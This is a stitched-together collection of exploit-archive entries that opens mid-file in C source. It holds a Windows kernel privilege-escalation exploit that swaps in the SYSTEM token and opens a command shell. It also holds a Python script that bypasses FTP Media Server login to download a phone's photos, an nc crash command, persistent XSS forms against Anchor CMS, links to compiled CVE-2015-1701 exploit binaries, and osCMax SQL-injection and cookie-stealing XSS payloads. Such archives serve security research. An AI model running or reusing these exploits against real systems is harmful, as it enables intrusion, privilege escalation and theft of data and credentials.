else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 )
{
atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a;
}
if( !atom ) __leave;
_ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" );
if( !ZwQuerySystemInformation ) __leave;
ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" );
if( !ZwAllocateVirtualMemory ) __leave;
ULONG len;
LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len );
if( !status ) __leave;
pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len );
if( !pm ) __leave;
status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len );
if( status ) __leave;
CHAR szKrnl[MAX_PATH] = { 0 }, *t;
for( ULONG i = 0; i < pm->Count; ++i )
{
if( strstr( pm->Module[i].ImageName, "exe" ) )
{
t = strstr( pm->Module[i].ImageName, "nt" );
if( t )
{
strcpy_s( szKrnl, _countof( szKrnl ) - 1, t );
Base = pm->Module[i].Base;
break;
}
}
}
hMod = LoadLibraryA( szKrnl );
if( !hMod || !Base ) __leave;
PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" );
if( !PsLookupProcessByProcessId ) __leave;
PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) );
PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" );
if( !PsReferencePrimaryToken ) __leave;
PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) );
Pid = GetCurrentProcessId();
RetVal = TRUE;
}
__finally {
if( pm ) LocalFree( pm );
if( hMod ) FreeLibrary( hMod );
}
return RetVal;
}
LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
LPVOID pCurProcess = NULL;
LPVOID pSystemInfo = NULL;
PACCESS_TOKEN systemToken;
PACCESS_TOKEN targetToken;
PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess );
PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo );
targetToken = PsReferencePrimaryToken( pCurProcess );
systemToken = PsReferencePrimaryToken( pSystemInfo );
//
find_and_replace_member( ( PDWORD_PTR ) pCurProcess,
( DWORD_PTR ) targetToken,
( DWORD_PTR ) systemToken,
0x200 );
KrnlMode = TRUE;
return 0;
}
VOID WINAPI leave()
{
keybd_event( VK_ESCAPE, 0, 0, NULL );
keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL );
keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL );
}
LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam )
{
if( bSpawned )
{
leave();
ExitProcess( 0 );
}
switch( message )
{
case WM_CREATE:
SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL );
FlashWindow( hWnd, TRUE );
keybd_event( VK_LWIN, 0, 0, NULL );
break;
case WM_CLOSE:
DestroyWindow( hWnd );
break;
case WM_DESTROY:
PostQuitMessage( 0 );
break;
case WM_TIMER:
KillTimer( hWnd, ID_TIMER );
leave();
DestroyWindow( hWnd );
break;
default:
return DefWindowProc( hWnd, message, wParam, lParam );
}
return 0;
}
int APIENTRY _tWinMain( _In_ HINSTANCE hInstance,
_In_opt_ HINSTANCE hPrevInstance,
_In_ LPTSTR lpCmdLine,
_In_ int nCmdShow )
{
WNDCLASSEX wc = { sizeof( WNDCLASSEX ) };
HWND hWnd = NULL;
MSG Msg = { 0 };
SIZE_T size = 0x1000;
LPVOID addr = ( LPVOID ) 1;
if( !Init() ) return 1;
if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) )
{
//
return 1;
}
DWORD_PTR p = pti();
if( !p ) return 1;
#ifdef _M_X64
*( ( PDWORD_PTR ) 0x10 ) = p;
*( ( LPBYTE ) 0x2a ) = 4;
*( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode;
*( ( PDWORD_PTR ) 0xa8 ) = 0x400;
*( ( LPDWORD ) 0x404 ) = 1;
*( ( PDWORD_PTR ) 0x408 ) = 0x800;
*( ( LPWORD ) 0x410 ) = atom;
*( ( LPBYTE ) 0x412 ) = 1;
#else
*( ( LPDWORD ) 0x08 ) = p;
*( ( LPBYTE ) 0x16 ) = 4;
*( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode;
*( ( LPDWORD ) 0x6c ) = 0x400;
*( ( LPDWORD ) 0x404 ) = 1;
*( ( LPDWORD ) 0x408 ) = 0x800;
*( ( LPWORD ) 0x40c ) = atom;
*( ( LPBYTE ) 0x40e ) = 1;
#endif
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = TEXT( "Class" );
if( !RegisterClassEx( &wc ) )
return 1;
hWnd = CreateWindowEx(
WS_EX_CLIENTEDGE,
TEXT( "Class" ),
TEXT( "Window" ),
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 200, 100,
NULL, NULL, hInstance, NULL );
if( !hWnd )
return 1;
ShowWindow( hWnd, SW_HIDE );
UpdateWindow( hWnd );
while( GetMessage( &Msg, NULL, 0, 0 ) )
{
if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010
{
if( !KrnlMode )
{
Msg.hwnd = ( HWND ) NULL;
}
else
{
Msg.hwnd = hWnd;
if( !bSpawned )
{
ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW );
bSpawned = TRUE;
}
}
}
TranslateMessage( &Msg );
DispatchMessage( &Msg );
}
return ( int ) Msg.wParam;
}
// EOF
//ex.h
#pragma once
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) (
_In_ HANDLE ProcessHandle,
_Inout_ PVOID *BaseAddress,
_In_ ULONG_PTR ZeroBits,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG AllocationType,
_In_ ULONG Protect
);
typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) (
_In_ HANDLE ProcessId,
_Out_ PVOID *Process
);
typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) (
_Inout_ PVOID Process
);
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemModuleInformation = 11
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) (
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength
);
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
#define ID_TIMER 0x1
#define WM_SYSTIMER 0x118
// EOF
#!/usr/bin/env python
#==================================================================================
# Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
# Date: 2015-05-25
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Exploit Author's Homepage: http://www.mikeallen.org
# Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
# Version: 3.0
# Tested on: iPhone
#==================================================================================
# ------------------
# Denial of Service:
# ------------------
# The FTP server does not properly handle errors raised by invalid
# FTP commands. The following command, which sends an invalid PORT command to
# the FTP server, will crash the server once it is received.
# echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000
# ----------------------
# Authentication Bypass:
# ----------------------
# The FTP server does not handle unauthenticated connections or incorrect login
# credentials properly. A remote user can issue commands to the FTP server
# without authenticating or after entering incorrect credentials.
# The following proof-of-concept connects to the given FTP server and
# downloads all files stored in the "Camera Roll" folder without providing a
# username or password:
import sys
from ftplib import FTP
if len(sys.argv) <= 1:
print "Usage: ./ftp-nologin.py [host] [port]"
exit()
host = sys.argv[1]
port = int(sys.argv[2])
files = []
def append_file(s):
files.append(s.split(' ')[-1])
blocks = []
def get_blocks(d):
blocks.append(d)
ftp = FTP()
print ftp.connect(host, port)
ftp.set_pasv(1)
ftp.cwd("Camera Roll")
print ftp.retrlines('LIST', append_file)
files.pop(0)
for filename in files:
print "Downloading %s..." % filename
ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)
f = open(filename, 'wb')
for block in blocks:
f.write(block)
f.close()
print "[+] File saved to: %s" % filename
blocks = []
ftp.quit()
source: https://www.securityfocus.com/bid/53181/info
Anchor CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible.
Anchor CMS 0.6-14-ga85d0a0 is vulnerable; other versions may also be affected.
<html>
<title>Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities</title>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
</script>
<form action="http://www.example.com/anchorcms/index.php/admin/users/login" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="user" value='"><script>alert(1);</script>' />
<input type="hidden" name="pass" value="admin" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/users/amnesia" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="email" value='"><script>alert(1);</script>' />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/posts/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="comments" value="1" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="html" value="1" />
<input type="hidden" name="js" value="" />
<input type="hidden" name="slug" value='"><script>alert(2);</script>' />
<input type="hidden" name="status" value="published" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/pages/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="hidden" name="content" value="Zero Science Lab" />
<input type="hidden" name="slug" value="ZSL" />
<input type="hidden" name="status" value="published" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/users/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="real_name" value='"><script>alert(1);</script>' />
<input type="hidden" name="bio" value="MK" />
<input type="hidden" name="email" value='"><script>alert(3);</script>' />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="role" value="administrator" />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="username" value='"><script>alert(2);</script>' />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/metadata" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="auto_published_comments" value="1" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="home_page" value="1" />
<input type="hidden" name="posts_page" value="1" />
<input type="hidden" name="posts_per_page" value="1" />
<input type="hidden" name="save" value="" />
<input type="hidden" name="sitename" value='"><script>alert(2);</script>' />
<input type="hidden" name="theme" value="default" />
<input type="hidden" name="twitter" value='"><script>alert(3);</script>' />
</form>
<br /><br />
<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
<a href='http://www.example.com/anchorcms/index.php/"><script>alert(1);</script>'>XSS 6</a>
</body></html>
# Source: https://github.com/hfiref0x/CVE-2015-1701
Win32k LPE vulnerability used in APT attack
Original info: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
Credits
R136a1 / hfiref0x
## Compiled EXE:
### x86
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe
+ Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-32.exe
### x64
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
+ Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-64.exe
## Source Code:
+ https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip
+ EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-src.zip
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_monthly_sales.php?status=0 union select '<? php_code ?>' INTO OUTFILE '../../../path/to/site/file.php'
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/admin/login.php?action=process" method="post" name="main" id="main">
<input type="hidden" name="username" value="',1,2,(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))) -- 2">
<input type="hidden" name="password" value="">
<input type="submit" name="submit" value="Send">
</form>
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/new_attributes_include.php?pageTitle=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/geo_zones.php?action=list&zID=%27%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/information_manager.php?information_action=Edit&information_id=%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_customers.php?sorted=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_products_purchased.php?gross=%22%20%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E
http://www.example.com/admin/stats_products_purchased.php?max=%27%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/admin/htaccess.php" method="post" name="main" id="main">
<input type="hidden" name="sb_id" value='"><script>alert(1);</script>'>
<input type="hidden" name="sb_key" value='"><script>alert(2);</script>'>
<input type="hidden" name="gc_id" value='"><script>alert(3);</script>'>
<input type="hidden" name="gc_key" value='"><script>alert(4);</script>'>
<input type="hidden" name="path" value='"><script>alert(5);</script>'>
<input type="submit" name="submit" value="Send">
</form>
source: https://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/xsell.php?search=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E